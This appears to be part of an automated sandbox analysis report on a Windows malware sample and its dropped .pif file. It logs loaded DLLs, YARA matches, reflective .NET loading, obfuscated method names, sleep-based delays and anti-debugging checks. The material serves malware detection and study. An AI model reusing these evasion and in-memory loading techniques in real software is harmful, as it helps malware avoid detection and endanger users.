Source: C:\Users\user\Links\daphpvwO.pif	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Section loaded: dpapi.dll	Jump to behavior

Source: Yara match	File source: 0.2.ja811MqV4h.exe.29c0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ja811MqV4h.exe.23c9548.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ja811MqV4h.exe.23c9548.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1326628339.00000000023C9000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: 5.2.daphpvwO.pif.28880ee8.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 5.2.daphpvwO.pif.2aec0000.9.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 5.2.daphpvwO.pif.298e6458.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 5.3.daphpvwO.pif.268f6d60.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 5.2.daphpvwO.pif.2990e990.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 5.2.daphpvwO.pif.28601b8e.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Source: 5.2.daphpvwO.pif.298e5570.8.raw.unpack, _.cs	.Net Code: ___ System.Reflection.Assembly.Load(byte[])
Source: 5.2.daphpvwO.pif.28600ca6.2.raw.unpack, _.cs	.Net Code: ___ System.Reflection.Assembly.Load(byte[])
Source: 5.2.daphpvwO.pif.28880000.4.raw.unpack, _.cs	.Net Code: ___ System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: 0_2_029E62A4 push 029E630Fh; ret	0_2_029E6307
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: 0_2_029C3210 push eax; ret	0_2_029C324C
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: 0_2_029E60AC push 029E6125h; ret	0_2_029E611D
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: 0_2_029DA018 push ecx; mov dword ptr [esp], edx	0_2_029DA01D
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: 0_2_029D606C push 029D60A4h; ret	0_2_029D609C
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: 0_2_029E61F8 push 029E6288h; ret	0_2_029E6280
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: 0_2_029E6144 push 029E61ECh; ret	0_2_029E61E4
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: 0_2_029C617C push 029C61BEh; ret	0_2_029C61B6
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: 0_2_029C617A push 029C61BEh; ret	0_2_029C61B6
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: 0_2_029CF600 push 029CF64Dh; ret	0_2_029CF645
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: 0_2_029CC498 push 029CC61Eh; ret	0_2_029CC616
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: 0_2_029CC486 push 029CC61Eh; ret	0_2_029CC616
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: 0_2_029CF4F4 push 029CF56Ah; ret	0_2_029CF562
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: 0_2_029D2410 push ecx; mov dword ptr [esp], edx	0_2_029D2412
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: 0_2_029CF5FF push 029CF64Dh; ret	0_2_029CF645
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: 0_2_029E5854 push 029E5A3Ah; ret	0_2_029E5A32
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: 0_2_029D2EDC push 029D2F87h; ret	0_2_029D2F7F
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: 0_2_029D2EDA push 029D2F87h; ret	0_2_029D2F7F
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: 0_2_029CBE18 push ecx; mov dword ptr [esp], edx	0_2_029CBE1D
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: 0_2_029D3F84 push 029D3FBCh; ret	0_2_029D3FB4
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: 0_2_029D9FB4 push ecx; mov dword ptr [esp], edx	0_2_029D9FB9
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: 0_2_029C5D9E push 029C5DFBh; ret	0_2_029C5DF3
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: 0_2_029C5DA0 push 029C5DFBh; ret	0_2_029C5DF3
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: 0_2_029CCDE0 push 029CCE0Ch; ret	0_2_029CCE04
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: 0_2_029D3D40 push 029D3D82h; ret	0_2_029D3D7A
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_0041C40C push cs; iretd	5_2_0041C4E2
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_00423149 push eax; ret	5_2_00423179
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_0041C50E push cs; iretd	5_2_0041C4E2
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_004231C8 push eax; ret	5_2_00423179
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_0040E21D push ecx; ret	5_2_0040E230
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_0041C6BE push ebx; ret	5_2_0041C6BF

Source: 5.2.daphpvwO.pif.28880ee8.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'CHtRxI1vagglf', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 5.2.daphpvwO.pif.2aec0000.9.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'CHtRxI1vagglf', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 5.2.daphpvwO.pif.298e6458.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'CHtRxI1vagglf', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 5.3.daphpvwO.pif.268f6d60.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'CHtRxI1vagglf', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 5.2.daphpvwO.pif.2990e990.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'CHtRxI1vagglf', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 5.2.daphpvwO.pif.28601b8e.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'CHtRxI1vagglf', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

Source: C:\Users\user\Desktop\ja811MqV4h.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Links\daphpvwO.pif	Memory allocated: 28420000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Memory allocated: 288E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Memory allocated: 2A8E0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 599312	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 599080	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 598953	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 598734	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 598621	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 598513	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 598296	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 598185	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 598078	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 597969	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 597734	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 597625	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 597516	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 597406	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 597297	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 597183	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 597075	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 596969	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 596859	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 596750	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 596641	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 596516	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 596391	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 596170	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 596062	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 595843	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 594969	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 594641	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 594531	Jump to behavior

Source: C:\Users\user\Links\daphpvwO.pif	Window / User API: threadDelayed 1829	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Window / User API: threadDelayed 8017	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Window / User API: foregroundWindowGot 1767	Jump to behavior

Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -35971150943733603s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9116	Thread sleep count: 1829 > 30	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9116	Thread sleep count: 8017 > 30	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -599422s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -599312s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -599203s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -599080s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -598953s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -598844s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -598734s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -598621s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -598513s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -598406s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -598296s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -598185s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -598078s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -597969s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -597844s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -597734s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -597625s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -597516s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -597406s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -597297s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -597183s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -597075s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -596969s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -596859s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -596750s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -596641s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -596516s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -596391s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -596281s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -596170s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -596062s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -595953s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -595843s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -595734s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -595625s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -595515s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -595406s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -595297s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -595187s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -595078s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -594969s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -594859s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -594750s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -594641s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 9108	Thread sleep time: -594531s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\ja811MqV4h.exe	API call chain: ExitProcess graph end node			graph_0-25709
Source: C:\Users\user\Links\daphpvwO.pif	API call chain: ExitProcess graph end node			graph_5-55895

Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_0040CE09
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_0040E61C
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00416F6A
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_004123F1 SetUnhandledExceptionFilter,	5_2_004123F1
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_1_0040CE09
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_1_0040E61C
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_1_00416F6A
